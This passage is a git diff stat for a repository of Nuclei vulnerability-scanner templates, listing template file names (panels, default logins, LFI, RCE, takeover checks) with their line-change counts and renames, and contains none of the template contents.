httpbin-open-redirect-8049.yaml} | 0 .../Other/httpbin-panel-8051.yaml | 21 + nuclei-templates/Other/httpbin-panel.yaml | 25 - nuclei-templates/Other/httpbin-xss-8052.yaml | 33 - nuclei-templates/Other/httpbin-xss-8053.yaml | 15 + ...tpd-config-8055.yaml => httpd-config.yaml} | 0 .../Other/httponly-cookie-detect.yaml | 7 +- .../huawei-HG532e-default-router-login.yaml | 43 - .../Other/huawei-firewall-lfi.yaml | 4 +- .../Other/huawei-hg255s-lfi-8060.yaml | 23 + nuclei-templates/Other/huawei-hg255s-lfi.yaml | 27 - ...awei-hg532e-default-router-login-8064.yaml | 38 + .../Other/huawei-hg532e-panel-8065.yaml | 34 + .../Other/huawei-hg532e-panel.yaml | 30 - nuclei-templates/Other/huawei-hg659-lfi.yaml | 16 +- ...way-8072.yaml => huawei-home-gateway.yaml} | 0 ...75.yaml => huawei-router-auth-bypass.yaml} | 0 ...read.yaml => huayu-Reporter-fileRead.yaml} | 0 ...orter-rce.yaml => huayu-Reporter-rce.yaml} | 0 .../Other/hubspot-takeover-8078.yaml | 18 + nuclei-templates/Other/hubspot-takeover.yaml | 20 - nuclei-templates/Other/hubspot.yaml | 31 + .../Other/hue-default-credential-8080.yaml | 70 - .../Other/hue-default-credential-8081.yaml | 67 + .../Other/hue-personal-wireless-panel.yaml | 5 +- nuclei-templates/Other/hue.yaml | 20 + nuclei-templates/Other/hugo-detect.yaml | 6 +- .../Other/huijietong-cloud-fileread-8082.yaml | 19 + .../Other/huijietong-cloud-fileread-8085.yaml | 23 - .../Other/huiwen-bibliographic-info-leak.yaml | 6 +- .../Other/hybris-administration-console.yaml | 16 +- .../Other/hybris-default-login.yaml | 8 +- nuclei-templates/Other/hybris.yaml | 20 + nuclei-templates/Other/hydra-dashboard.yaml | 14 +- .../Other/hydracrypt-malware.yaml | 8 +- .../Other/hypertest-dashboard.yaml | 9 +- nuclei-templates/Other/i-mscp-panel.yaml | 6 +- .../Other/iam-password-policy.yaml | 37 +- .../ibm-advanced-system-management-8090.yaml | 20 + .../Other/ibm-advanced-system-management.yaml | 24 - .../Other/ibm-d2b-database-server.yaml | 75 +- nuclei-templates/Other/ibm-dcec-panel.yaml | 6 +- .../Other/ibm-decision-server-console.yaml | 6 +- .../Other/ibm-friendly-path-exposure-1.yaml | 35 + ...l => ibm-friendly-path-exposure-8092.yaml} | 0 .../Other/ibm-http-server-8097.yaml | 29 - nuclei-templates/Other/ibm-http-server.yaml | 25 + ...t-lfi.yaml => ibm-infoprint-lfi-8105.yaml} | 0 nuclei-templates/Other/ibm-maximo-login.yaml | 13 +- nuclei-templates/Other/ibm-maximo-panel.yaml | 2 - nuclei-templates/Other/ibm-odm-detect.yaml | 2 +- nuclei-templates/Other/ibm-odm-panel.yaml | 6 +- .../Other/ibm-openadmin-panel.yaml | 5 +- .../Other/ibm-security-access-manager.yaml | 3 +- .../Other/ibm-service-assistant.yaml | 4 - ...ect-8122.yaml => ibm-sterling-detect.yaml} | 0 ... ibm-storage-default-credential-8123.yaml} | 0 nuclei-templates/Other/ibm-tririga-panel.yaml | 4 - .../Other/ibm-websphere-admin-panel.yaml | 13 +- .../Other/ibm-websphere-ssrf.yaml | 10 +- nuclei-templates/Other/icc-pro-login.yaml | 9 +- .../Other/icecast-server-detect.yaml | 5 +- nuclei-templates/Other/icedid.yaml | 5 +- ....yaml => iceflow-vpn-disclosure-8128.yaml} | 0 .../Other/icewarp-open-redirect.yaml | 5 - .../Other/icewarp-panel-detect.yaml | 13 +- .../Other/icewarp-webclient-rce-8131.yaml | 24 + .../Other/icewarp-webclient-rce.yaml | 28 - .../Other/ictprotege-login-panel.yaml | 18 +- .../idemia-biometrics-default-login-8139.yaml | 39 - .../idemia-biometrics-default-login.yaml | 40 + .../Other/identity-services-engine.yaml | 3 +- ...entityguard-selfservice-entrust-8142.yaml} | 0 ...n-params.yaml => idor-vuln-params(1).yaml} | 0 .../iis-errorpage-detection-all-lang.yaml | 5 +- .../iis-internal-ip-disclosure-8148.yaml | 33 + .../Other/iis-internal-ip-disclosure.yaml | 29 - nuclei-templates/Other/ilch-admin-panel.yaml | 12 +- nuclei-templates/Other/ilias-panel.yaml | 13 +- nuclei-templates/Other/imagify.yaml | 4 +- nuclei-templates/Other/imap-detect.yaml | 61 +- nuclei-templates/Other/immich-panel.yaml | 5 +- nuclei-templates/Other/impresscms-detect.yaml | 6 +- .../Other/impresspages-installer.yaml | 7 +- nuclei-templates/Other/imsanity.yaml | 2 +- .../Other/inactivity-timeout.yaml | 15 +- .../Other/incapptic-connect-panel.yaml | 11 +- .../Other/indegy-sensor-installer.yaml | 7 +- ...ct-8159.yaml => influxdb-detect-8160.yaml} | 0 nuclei-templates/Other/influxdb-panel.yaml | 12 +- .../Other/influxdb-version-detect.yaml | 13 +- nuclei-templates/Other/influxdb-version.yaml | 14 +- .../Other/insecure-cipher-suite-detect.yaml | 5 +- ...l => insecure-firebase-database-8161.yaml} | 0 .../Other/insert-headers-and-footers.yaml | 2 +- ...spur-clusterengine-default-login-8162.yaml | 48 - .../inspur-clusterengine-default-login.yaml | 39 + .../Other/inspur-clusterengine-rce.yaml | 17 +- nuclei-templates/Other/instagram.yaml | 39 + .../Other/integrated_management_module.yaml | 23 + ...s-login.yaml => intelbras-login-8163.yaml} | 0 nuclei-templates/Other/intelbras-panel.yaml | 14 +- .../Other/intellian-aptus-panel.yaml | 15 +- .../Other/intelliflash-login-panel.yaml | 8 +- ...erver.yaml => interactsh-server-8165.yaml} | 0 .../Other/interactsoftware-interact.yaml | 5 +- ...-8166.yaml => intercom-takeover-8167.yaml} | 0 nuclei-templates/Other/intercom.yaml | 10 +- nuclei-templates/Other/interlib-fileread.yaml | 14 +- ...e-8177.yaml => internet-service-8178.yaml} | 0 .../Other/interstingExtensions.yaml | 394 +- .../Other/intuitive-custom-post-order.yaml | 2 +- .../Other/iot-vdme-simulator.yaml | 12 +- ...e.yaml => iotawatt-app-exposure-8187.yaml} | 0 .../Other/ipdiva-mediation-panel.yaml | 10 +- .../Other/iplanet-web-server-8191.yaml | 21 + .../Other/iplanet-web-server.yaml | 25 - nuclei-templates/Other/ipstack.yaml | 23 - .../Other/iptime-default-login-8194.yaml | 32 + .../Other/iptime-default-login.yaml | 37 - ...me-router.yaml => iptime-router-8195.yaml} | 0 nuclei-templates/Other/isams-panel.yaml | 5 +- .../Other/ispyconnect-detect.yaml | 5 +- nuclei-templates/Other/issabel-login.yaml | 10 +- ...fi-8199.yaml => issuu-panel-lfi-8200.yaml} | 0 .../Other/istat-panel-detect.yaml | 8 +- .../{api-iterable-445.yaml => iterable.yaml} | 0 nuclei-templates/Other/itop-detect-8201.yaml | 24 - nuclei-templates/Other/itop-detect-8203.yaml | 19 + nuclei-templates/Other/itop-panel-8205.yaml | 27 - nuclei-templates/Other/itop-panel.yaml | 23 + .../Other/ivanti-connect-secure-panel.yaml | 12 +- nuclei-templates/Other/iwp-client.yaml | 2 +- nuclei-templates/Other/ixbusweb-version.yaml | 10 +- .../Other/ixcache-panel-8206.yaml | 28 - nuclei-templates/Other/ixcache-panel.yaml | 24 + .../Other/jamf-blind-xxe-8209.yaml | 50 - nuclei-templates/Other/jamf-blind-xxe.yaml | 46 + .../Other/jamf-log4j-jndi-rce.yaml | 18 +- nuclei-templates/Other/jamf-login.yaml | 10 +- nuclei-templates/Other/jamf-panel-8216.yaml | 39 + nuclei-templates/Other/jamf-panel.yaml | 32 - .../Other/jamf-pro-log4j-rce.yaml | 38 +- .../Other/jamf-setup-assistant.yaml | 9 +- nuclei-templates/Other/jaspersoft-detect.yaml | 16 + .../Other/java-melody-exposed-1.yaml | 29 + .../Other/java-melody-exposed-2.yaml | 29 + ...221.yaml => java-melody-exposed-8224.yaml} | 0 .../Other/java-melody-xss-8225.yaml | 7 +- nuclei-templates/Other/java-rmi-detect.yaml | 4 - nuclei-templates/Other/jboss-jbpm-admin.yaml | 17 +- .../Other/jboss-jbpm-default-login.yaml | 16 +- nuclei-templates/Other/jboss-juddi.yaml | 19 +- .../Other/jboss-seam-debug-page-8239.yaml | 22 + .../Other/jboss-seam-debug-page.yaml | 25 - .../Other/jboss-soa-platform.yaml | 17 +- nuclei-templates/Other/jboss-status.yaml | 6 +- nuclei-templates/Other/jboss-web-service.yaml | 7 +- nuclei-templates/Other/jbpm.yaml | 20 + nuclei-templates/Other/jcms-panel.yaml | 13 +- .../Other/jdbc-connection-string.yaml | 2 +- nuclei-templates/Other/jedox-web-panel.yaml | 10 +- .../Other/jeecg-boot-detect-8247.yaml | 24 - .../Other/jeecg-boot-detect-8248.yaml | 29 + .../Other/jeecg-boot-swagger.yaml | 4 +- .../Other/jeesite-default-login.yaml | 28 - ...WMS-fileRead.yaml => jeewms-fileread.yaml} | 0 ...wms-lfi-8254.yaml => jeewms-lfi-8255.yaml} | 0 ...-detect.yaml => jellyfin-detect-8257.yaml} | 0 .../Other/jellyseerr-login-panel.yaml | 5 +- .../cve-2024-23897.yaml => Other/jenk.yaml} | 0 nuclei-templates/Other/jenkins-api-panel.yaml | 6 +- .../Other/jenkins-asyncpeople-8267.yaml | 20 + .../Other/jenkins-asyncpeople.yaml | 20 - .../Other/jenkins-default-8273.yaml | 52 + .../Other/jenkins-default-login.yaml | 51 - ...s-detect.yaml => jenkins-detect-8275.yaml} | 0 .../Other/jenkins-login-detection.yaml | 13 +- .../Other/jenkins-openuser-register.yaml | 5 +- ...ipt-8281.yaml => jenkins-script-8284.yaml} | 0 ...287.yaml => jenkins-stack-trace-8285.yaml} | 0 nuclei-templates/Other/jenkins-token.yaml | 5 +- nuclei-templates/Other/jenkins-version.yaml | 12 +- ...s.yaml => jetbrains-datasources-8291.yaml} | 0 .../Other/jetbrains-takeover.yaml | 5 +- .../Other/jetbrains-webservers.yaml | 16 +- nuclei-templates/Other/jetpack.yaml | 2 +- nuclei-templates/Other/jexboss-backdoor.yaml | 7 +- .../{jfrog-8303.yaml => jfrog-8304.yaml} | 0 .../jfrog-unauth-build-exposed-8302.yaml | 31 + .../Other/jfrog-unauth-build-exposed.yaml | 35 - nuclei-templates/Other/jhipster-detect.yaml | 5 +- .../Other/jinfornet-jreport-lfi-8307.yaml | 3 +- .../Other/jinher-oa-default-login-8312.yaml | 10 +- nuclei-templates/Other/jira-detect-8316.yaml | 29 - nuclei-templates/Other/jira-detect.yaml | 14 + .../Other/jira-login-default.yaml | 5 +- .../Other/jira-service-desk-signup-8320.yaml | 23 - .../Other/jira-service-desk-signup-8321.yaml | 21 + .../Other/jira-servicedesk-signup.yaml | 18 +- nuclei-templates/Other/jira-setup.yaml | 8 +- .../jira-unauthenticated-dashboards-8323.yaml | 30 - .../jira-unauthenticated-dashboards.yaml | 26 + ...ira-unauthenticated-installed-gadgets.yaml | 4 - ...-unauthenticated-popular-filters-8331.yaml | 2 - .../jira-unauthenticated-popular-filters.yaml | 23 + ...nauthenticated-projectcategories-8332.yaml | 1 - ...> jira-unauthenticated-projects-8335.yaml} | 0 ...=> jira-unauthenticated-screens-8338.yaml} | 0 .../jira-unauthenticated-user-picker.yaml | 15 - nuclei-templates/Other/jira_user_piker.yaml | 16 + nuclei-templates/Other/jitsi-meet.yaml | 19 + .../Other/jkstatus-manager-8347.yaml | 18 + nuclei-templates/Other/jkstatus-manager.yaml | 17 - .../Other/jmx-default-login-8356.yaml | 43 + nuclei-templates/Other/jmx-default-login.yaml | 38 - nuclei-templates/Other/joget-panel.yaml | 12 +- nuclei-templates/Other/jolokia-8367.yaml | 6 +- .../Other/jolokia-info-disclosure.yaml | 144 +- nuclei-templates/Other/jolokia-list.yaml | 13 +- .../Other/jolokia-logback-jndi-rce.yaml | 4 +- .../Other/jolokia-mbean-search-8363.yaml | 35 + .../Other/jolokia-mbean-search.yaml | 26 - .../jolokia-unauthenticated-lfi-8364.yaml | 32 + .../Other/jolokia-unauthenticated-lfi.yaml | 31 - .../Other/joomla-com-fabrik-lfi-8370.yaml | 27 - .../Other/joomla-com-fabrik-lfi-8373.yaml | 31 + nuclei-templates/Other/joomla-detect.yaml | 34 +- .../Other/joomla-file-listing.yaml | 6 +- ...taccess.yaml => joomla-htaccess-8382.yaml} | 0 nuclei-templates/Other/joomla-installer.yaml | 5 +- .../Other/joomla-jvehicles-lfi.yaml | 12 +- .../Other/joomla-manifest-file-8386.yaml | 30 - .../Other/joomla-manifest-file-8387.yaml | 25 + ...omla-panel.yaml => joomla-panel-8391.yaml} | 0 .../Other/joomla-workflow-8395.yaml | 13 + nuclei-templates/Other/joomla-workflow.yaml | 13 - nuclei-templates/Other/jorani-panel.yaml | 5 +- nuclei-templates/Other/js-analyse.yaml | 94 +- .../Other/js-endpoint-extractor.yaml | 48 +- nuclei-templates/Other/jsapi-ticket-json.yaml | 5 +- nuclei-templates/Other/jsconfig-json.yaml | 4 +- nuclei-templates/Other/jsf-detect.yaml | 7 +- nuclei-templates/Other/jsherp-boot-panel.yaml | 5 +- nuclei-templates/Other/json-server.yaml | 5 +- nuclei-templates/Other/json.yaml | 31 +- nuclei-templates/Other/jspxcms-detect.yaml | 6 +- nuclei-templates/Other/jumpserver-panel.yaml | 21 +- nuclei-templates/Other/juniper-panel.yaml | 6 +- .../Other/jupyter-ipython-unauth-8402.yaml | 24 - .../Other/jupyter-ipython-unauth-8405.yaml | 21 + .../Other/jupyter-lab-unauth.yaml | 5 +- nuclei-templates/Other/jupyter-notebook.yaml | 30 +- .../Other/jupyter-notebooks-exposed.yaml | 8 +- .../Other/jupyterhub-default-login-8401.yaml | 36 + .../Other/jupyterhub-default-login.yaml | 48 - nuclei-templates/Other/jwt-token-8410.yaml | 18 + nuclei-templates/Other/jwt-token.yaml | 18 - nuclei-templates/Other/kadence-blocks.yaml | 2 +- nuclei-templates/Other/kaes-file-manager.yaml | 9 +- ...kafdrop-xss.yaml => kafdrop-xss-8411.yaml} | 0 .../kafka-center-default-login-8416.yaml | 38 + .../Other/kafka-center-default-login.yaml | 41 - .../Other/kafka-center-login.yaml | 3 - ...ect-ui.yaml => kafka-connect-ui-8423.yaml} | 0 .../Other/kafka-consumer-monitor.yaml | 7 +- .../Other/kafka-cruise-control-8427.yaml | 21 - .../Other/kafka-cruise-control.yaml | 18 + .../Other/kafka-manager-panel.yaml | 7 +- .../Other/kafka-manager-unauth.yaml | 5 +- ...toring.yaml => kafka-monitoring-8431.yaml} | 0 .../Other/kafka-topics-ui-8434.yaml | 17 + nuclei-templates/Other/kafka-topics-ui.yaml | 17 - .../Other/kanboard-default-login.yaml | 30 +- nuclei-templates/Other/kanboard-login.yaml | 13 +- .../Other/karaf-default-login.yaml | 6 +- nuclei-templates/Other/karaf.yaml | 20 + ...-lfi.yaml => karel-ip-phone-lfi-8436.yaml} | 0 nuclei-templates/Other/karma-config-js.yaml | 13 +- nuclei-templates/Other/kasm-login-panel.yaml | 5 +- nuclei-templates/Other/kavita-lfi.yaml | 15 +- .../Other/kavita-panel-detect.yaml | 9 +- .../Other/kenesto-login-8445.yaml | 25 - nuclei-templates/Other/kenesto-login.yaml | 22 + .../Other/kentico-login-8446.yaml | 21 + nuclei-templates/Other/kentico-login.yaml | 20 - .../Other/kentico-open-redirect-8448.yaml | 2 +- ...nt.yaml => kerio-connect-client-8452.yaml} | 0 .../Other/kettle-default-login.yaml | 5 +- nuclei-templates/Other/kettle-panel.yaml | 9 +- .../Other/kevinlab-bems-backdoor-8453.yaml | 18 +- .../Other/kevinlab-bems-sqli.yaml | 3 +- ....yaml => kevinlab-device-detect-8462.yaml} | 0 ....yaml => kevinlab-hems-backdoor-8465.yaml} | 0 .../Other/key-cloak-admin-panel.yaml | 14 +- .../Other/keycloak-admin-panel.yaml | 16 +- .../Other/keycloak-openid-config-8477.yaml | 26 + .../Other/keycloak-openid-config.yaml | 29 - nuclei-templates/Other/keycloak-xss-8482.yaml | 26 + nuclei-templates/Other/kfm-login-panel.yaml | 9 +- .../Other/kibana-detect-8484.yaml | 21 + nuclei-templates/Other/kibana-detect.yaml | 24 - nuclei-templates/Other/kibana-panel-8486.yaml | 20 +- .../kingdee-eas-directory-traversal-8489.yaml | 44 + .../kingdee-eas-directory-traversal.yaml | 41 - .../Other/kingsoft-v8-default-login.yaml | 8 +- .../Other/kingsoft-v8-file-read.yaml | 11 +- .../Other/kingsoft-webserver-detect.yaml | 6 +- .../Other/kingsoft_antivirus.yaml | 20 + ...akeover.yaml => kinsta-takeover-8493.yaml} | 0 nuclei-templates/Other/kio_firmware.yaml | 20 + nuclei-templates/Other/kirki.yaml | 2 +- .../Other/kiteworks-pcn-panel.yaml | 10 +- nuclei-templates/Other/kiwi_tcms.yaml | 20 + nuclei-templates/Other/kiwitcms-json-rpc.yaml | 39 + .../Other/kiwitcms-login-8496.yaml | 20 +- nuclei-templates/Other/kkfileview-panel.yaml | 9 +- nuclei-templates/Other/kkfileview-ssrf.yaml | 32 +- nuclei-templates/Other/klr300n-panel.yaml | 7 +- .../Other/known-default-account.yaml | 7 +- .../Other/kodak-network-panel.yaml | 7 +- nuclei-templates/Other/koel-panel.yaml | 4 +- ...detect-8500.yaml => kong-detect-8499.yaml} | 0 ...lt-login.yaml => konga-default-login.yaml} | 0 nuclei-templates/Other/konga-panel.yaml | 16 +- .../Other/kopano-webapp-panel.yaml | 6 +- .../Other/kraken-cluster-monitoring.yaml | 12 +- .../Other/kube-api-deployments.yaml | 6 +- .../Other/kube-api-namespaces.yaml | 5 +- .../Other/kube-api-nodes-8507.yaml | 24 +- .../Other/kube-api-pods-8510.yaml | 22 + nuclei-templates/Other/kube-api-pods.yaml | 25 - nuclei-templates/Other/kube-api-roles.yaml | 5 +- .../Other/kube-api-secrets-8512.yaml | 30 + nuclei-templates/Other/kube-api-secrets.yaml | 25 - ...vices.yaml => kube-api-services-8513.yaml} | 0 nuclei-templates/Other/kube-api-version.yaml | 8 +- .../Other/kube-dashboard-detect.yaml | 16 - .../Other/kubeflow-dashboard-unauth.yaml | 4 - .../Other/kubelet-healthz-8518.yaml | 33 - .../Other/kubelet-healthz-8519.yaml | 38 + .../Other/kubelet-metrics-8521.yaml | 30 - nuclei-templates/Other/kubelet-metrics.yaml | 26 + nuclei-templates/Other/kubelet-pods-8522.yaml | 30 + nuclei-templates/Other/kubelet-pods.yaml | 22 - nuclei-templates/Other/kubelet-scan.yaml | 7 +- nuclei-templates/Other/kubelet-stats.yaml | 8 +- .../Other/kubernetes-api-detect.yaml | 18 - .../kubernetes-enterprise-manager-8529.yaml | 25 + .../Other/kubernetes-enterprise-manager.yaml | 25 - .../Other/kubernetes-etcd-keys.yaml | 19 +- .../Other/kubernetes-fake-certificate.yaml | 5 +- .../kubernetes-kustomization-disclosure.yaml | 5 - .../Other/kubernetes-metrics-8536.yaml | 29 - .../Other/kubernetes-metrics.yaml | 25 + .../kubernetes-operational-view-detect.yaml | 5 +- .../Other/kubernetes-pods-8542.yaml | 25 + .../Other/kubernetes-pods-8543.yaml | 30 - ...9.yaml => kubernetes-resource-report.yaml} | 0 .../Other/kubernetes-version.yaml | 16 +- .../Other/kubernetes-web-view.yaml | 13 +- .../Other/kubeview-dashboard.yaml | 9 +- .../Other/kyan-credential-exposure.yaml | 6 - ...n-network-credentials-disclosure-8556.yaml | 32 - .../kyan-network-credentials-disclosure.yaml | 26 + .../Other/kyocera-m2035dn-lfi-8558.yaml | 28 + .../Other/kyocera-m2035dn-lfi.yaml | 26 - .../Other/labkey-server-login.yaml | 13 +- ...lacie-panel.yaml => lacie-panel-8561.yaml} | 0 .../Other/lancom-router-panel-8562.yaml | 22 + .../Other/lancom-router-panel.yaml | 18 - nuclei-templates/Other/landesk-csa.yaml | 5 +- nuclei-templates/Other/landesk-ma.yaml | 5 +- .../landfill-remote-monitoring-control.yaml | 26 + .../Other/landingi-takeover-8566.yaml | 17 + nuclei-templates/Other/landingi-takeover.yaml | 20 - .../Other/landray-oa-datajson-rce.yaml | 28 +- .../Other/landray-oa-erp-data-rce.yaml | 30 +- ...571.yaml => landray-oa-fileread-8569.yaml} | 0 ...andray-oa-sysSearchMain-editParam-rce.yaml | 22 +- ...-login.yaml => lansweeper-login-8573.yaml} | 0 .../Other/lantronix-webmanager-panel.yaml | 9 +- ...d.yaml => laravel-debug-enabled-8577.yaml} | 0 .../Other/laravel-debug-mode-405.yaml | 60 +- nuclei-templates/Other/laravel-env-8581.yaml | 17 + nuclei-templates/Other/laravel-env.yaml | 40 - .../Other/laravel-filemanager-8590.yaml | 24 - .../Other/laravel-filemanager-8591.yaml | 32 + .../Other/laravel-filemanager-lfi-8587.yaml | 1 + .../Other/laravel-ignition-xss-8592.yaml | 43 + .../Other/laravel-ignition-xss.yaml | 30 - .../Other/laravel-log-file-8597.yaml | 32 + .../Other/laravel-log-file-8598.yaml | 34 - .../Other/laravel-telescope-8601.yaml | 24 + nuclei-templates/Other/laravel-telescope.yaml | 21 - .../Other/larvel-debugbar-enabled.yaml | 2 +- .../Other/launchrock-takeover.yaml | 5 +- nuclei-templates/Other/lazy-file-8607.yaml | 17 + nuclei-templates/Other/lazy-file.yaml | 21 - .../Other/ldap-account-manager-panel.yaml | 9 +- .../Other/ldap-anonymous-login.yaml | 9 +- nuclei-templates/Other/ldap-wp-login-xss.yaml | 5 +- nuclei-templates/Other/leadin.yaml | 2 +- .../Other/leadpages-takeover.yaml | 6 +- nuclei-templates/Other/leira-cron-jobs.yaml | 59 + nuclei-templates/Other/leira-roles.yaml | 59 + nuclei-templates/Other/lemlist-takeover.yaml | 3 +- nuclei-templates/Other/lenovo-fp-panel.yaml | 15 +- .../Other/lenovo-thinkserver-panel.yaml | 8 +- .../Other/leostream-detection.yaml | 24 - nuclei-templates/Other/leostream-panel.yaml | 22 + nuclei-templates/Other/lfi-keyed.yaml | 118 - nuclei-templates/Other/lfi-linux-fuzz.yaml | 98 + nuclei-templates/Other/lfi.yaml | 24 - nuclei-templates/Other/lfr_express.yaml | 40 + nuclei-templates/Other/librenms-login.yaml | 13 +- nuclei-templates/Other/librephotos-panel.yaml | 5 +- nuclei-templates/Other/librespeed-panel.yaml | 5 +- .../Other/libvirt-exporter-metrics.yaml | 7 +- nuclei-templates/Other/liferay-api.yaml | 9 +- nuclei-templates/Other/liferay-axis.yaml | 5 +- nuclei-templates/Other/liferay-jsonws.yaml | 7 +- .../Other/liferay-portal-detect-8625.yaml | 22 + .../Other/liferay-portal-detect-8626.yaml | 23 - nuclei-templates/Other/liferay-portal.yaml | 12 +- .../Other/liferay-resource-leak.yaml | 5 +- nuclei-templates/Other/lighttpd-default.yaml | 19 + .../Other/limesurvey-installer.yaml | 5 +- .../Other/limit-login-attempts-reloaded.yaml | 2 +- .../Other/limit-login-attempts.yaml | 2 +- ...nkedin-id.yaml => linkedin-client-id.yaml} | 0 ...ect-8632.yaml => linkerd-detect-8633.yaml} | 0 nuclei-templates/Other/linkerd-panel.yaml | 12 +- .../Other/linkerd-ssrf-detect-8637.yaml | 21 - .../Other/linkerd-ssrf-detect.yaml | 19 + nuclei-templates/Other/linkerd-ssrf.yaml | 7 +- .../Other/linksys-wifi-login-8644.yaml | 28 - .../Other/linksys-wifi-login.yaml | 23 + .../Other/linktap-gateway-exposure.yaml | 5 +- nuclei-templates/Other/linshare-panel.yaml | 6 +- nuclei-templates/Other/linux-lfi-fuzz.yaml | 98 - nuclei-templates/Other/linux-lfi-fuzzing.yaml | 51 + .../Other/liquibase-spring-boot.yaml | 2 - nuclei-templates/Other/litespeed-cache.yaml | 2 +- .../Other/livehelperchat-admin-panel.yaml | 14 +- .../Other/livehelperchat-detect.yaml | 38 +- .../Other/liveview-axis-camera-8647.yaml | 36 + .../Other/liveview-axis-camera.yaml | 27 - nuclei-templates/Other/lmszai-installer.yaml | 5 +- nuclei-templates/Other/loancms-sqli.yaml | 12 +- .../Other/locklizard-webviewer-panel.yaml | 9 +- nuclei-templates/Other/lockself-panel.yaml | 4 +- nuclei-templates/Other/loco-translate.yaml | 2 +- nuclei-templates/Other/locust-exposure.yaml | 13 +- nuclei-templates/Other/log4j-code42-rce.yaml | 5 +- nuclei-templates/Other/log4j-detect.yaml | 5 - ...d-poc.yaml => log4j-fuzz-head-poc-v1.yaml} | 0 .../Other/log4j-fuzz-head-poc-v2.yaml | 217 - ...{log4jshell-detect.yaml => log4j-url.yaml} | 0 nuclei-templates/Other/log4shell.yaml | 125 +- nuclei-templates/Other/loganalyzer.yaml | 37 + nuclei-templates/Other/logging-enable.yaml | 15 +- nuclei-templates/Other/loginizer.yaml | 2 +- nuclei-templates/Other/loginpress.yaml | 4 +- .../{logins (copy 1).yaml => logins.yaml} | 0 .../Other/logitech-harmony-portal.yaml | 9 +- nuclei-templates/Other/logstash.yaml | 20 + nuclei-templates/Other/lomnido-panel.yaml | 4 +- nuclei-templates/Other/looker-panel.yaml | 9 +- nuclei-templates/Other/loqate-api-key.yaml | 6 +- .../{api-loqate-453.yaml => loqate.yaml} | 0 .../Other/lotus-core-cms-lfi.yaml | 5 - .../Other/lotus-domino-version-8654.yaml | 34 - .../Other/lotus-domino-version.yaml | 32 + nuclei-templates/Other/lotuscms-rce-8653.yaml | 34 + nuclei-templates/Other/lotuscms-rce.yaml | 25 - nuclei-templates/Other/loxone-panel.yaml | 9 +- nuclei-templates/Other/loytec-device.yaml | 7 +- .../Other/lucas-string-replace.yaml | 59 + nuclei-templates/Other/lucee-detect.yaml | 5 +- nuclei-templates/Other/lucee-login-8665.yaml | 25 + nuclei-templates/Other/lucee-login.yaml | 21 - .../Other/lucee-stack-trace-8668.yaml | 21 + .../Other/lucee-stack-trace-8669.yaml | 25 - nuclei-templates/Other/lucy-admin-panel.yaml | 6 +- .../luftguitar-arbitrary-file-upload.yaml | 5 - .../Other/lutron-default-login.yaml | 16 +- ...aml => lutron-iot-default-login-8675.yaml} | 0 .../Other/lvm-exporter-metrics.yaml | 9 +- .../Other/lvmeng-uts-disclosure.yaml | 3 - nuclei-templates/Other/lychee-installer.yaml | 5 +- nuclei-templates/Other/mac-c2-jarm.yaml | 5 +- .../Other/maccmsv10-backdoor-8683.yaml | 34 + .../Other/maccmsv10-backdoor.yaml | 25 - nuclei-templates/Other/mach-proweb-login.yaml | 9 +- .../Other/machform-admin-panel.yaml | 14 +- .../Other/macos-bella-malware.yaml | 7 +- nuclei-templates/Other/macshell-c2-jarm.yaml | 5 +- .../Other/maestro-login-panel.yaml | 10 +- .../Other/mag-dashboard-panel.yaml | 10 +- ...i.yaml => magento-2-exposed-api-8688.yaml} | 0 .../Other/magento-admin-panel-8693.yaml | 25 - .../Other/magento-admin-panel.yaml | 21 + ...eleak.yaml => magento-cacheleak-8699.yaml} | 0 .../Other/magento-config-8703.yaml | 28 + .../Other/magento-config-disclosure.yaml | 13 +- nuclei-templates/Other/magento-config.yaml | 24 - .../Other/magento-downloader-panel.yaml | 17 +- nuclei-templates/Other/magento-installer.yaml | 5 +- .../magento-unprotected-dev-files-8708.yaml | 32 + .../magento-unprotected-dev-files-8709.yaml | 35 - .../Other/magicflow-lfi-8710.yaml | 26 - .../Other/magicflow-lfi-8713.yaml | 22 + nuclei-templates/Other/magnolia-panel.yaml | 6 +- nuclei-templates/Other/magnolia_cms.yaml | 20 + nuclei-templates/Other/maian-cart-detect.yaml | 5 +- .../Other/maian-cart-preauth-rce.yaml | 14 +- nuclei-templates/Other/mailchimp-api(1).yaml | 13 + .../Other/mailchimp-api-key-8722.yaml | 18 - .../Other/mailchimp-api-key-8724.yaml | 15 + .../Other/mailchimp-for-woocommerce.yaml | 2 +- nuclei-templates/Other/mailchimp-for-wp.yaml | 2 +- nuclei-templates/Other/mailchimp.yaml | 21 + nuclei-templates/Other/mailgun-api.yaml | 16 - nuclei-templates/Other/mailhog-panel.yaml | 9 +- nuclei-templates/Other/mailpoet.yaml | 6 +- nuclei-templates/Other/mailwatch-login.yaml | 10 +- .../Other/maintainer-account.yaml | 13 +- nuclei-templates/Other/maintenance.yaml | 2 +- nuclei-templates/Other/mainwp-child.yaml | 6 +- nuclei-templates/Other/malcare-security.yaml | 2 +- nuclei-templates/Other/maltrail-panel.yaml | 5 +- ...it.yaml => manageengine-adaudit-8730.yaml} | 0 .../Other/manageengine-adselfservice.yaml | 8 +- .../Other/manageengine-analytics.yaml | 6 +- .../manageengine-apex-helpdesk-8748.yaml | 20 + .../Other/manageengine-apex-helpdesk.yaml | 23 - ...nageengine-applications-manager-8753.yaml} | 0 .../manageengine-assetexplorer-8756.yaml | 19 + .../manageengine-assetexplorer-8757.yaml | 23 - .../Other/manageengine-keymanagerplus.yaml | 7 +- .../Other/manageengine-network-config.yaml | 14 +- .../Other/manageengine-opmanager-8768.yaml | 23 - .../Other/manageengine-opmanager.yaml | 19 + .../Other/manageengine-servicedesk.yaml | 7 +- .../manageengine-supportcenter-8775.yaml | 23 - .../Other/manageengine-supportcenter.yaml | 24 + .../Other/manageengine_netflow_analyzer.yaml | 20 + ...is-detect.yaml => mantis-detect-8780.yaml} | 0 .../mantisbt-default-credential-8778.yaml | 47 + nuclei-templates/Other/mantisbt-panel.yaml | 12 +- .../Other/mapbox-token-disclosure.yaml | 4 +- nuclei-templates/Other/mapbox-token.yaml | 5 +- ...r-8786.yaml => mashery-takeover-8785.yaml} | 0 ...s-hunt-CVE-2024-24919-with-many-paths.yaml | 35 +- ...hop-sqli.yaml => maticsoft-shop-sqli.yaml} | 0 nuclei-templates/Other/matomo-installer.yaml | 5 +- .../Other/matomo-login-portal.yaml | 19 +- nuclei-templates/Other/matrix-detect.yaml | 7 +- ...-panel.yaml => mautic-crm-panel-8789.yaml} | 0 nuclei-templates/Other/mautic-installer.yaml | 5 +- ...rce-8790.yaml => mcafee-epo-rce-8793.yaml} | 0 nuclei-templates/Other/mcloud-installer.yaml | 11 +- 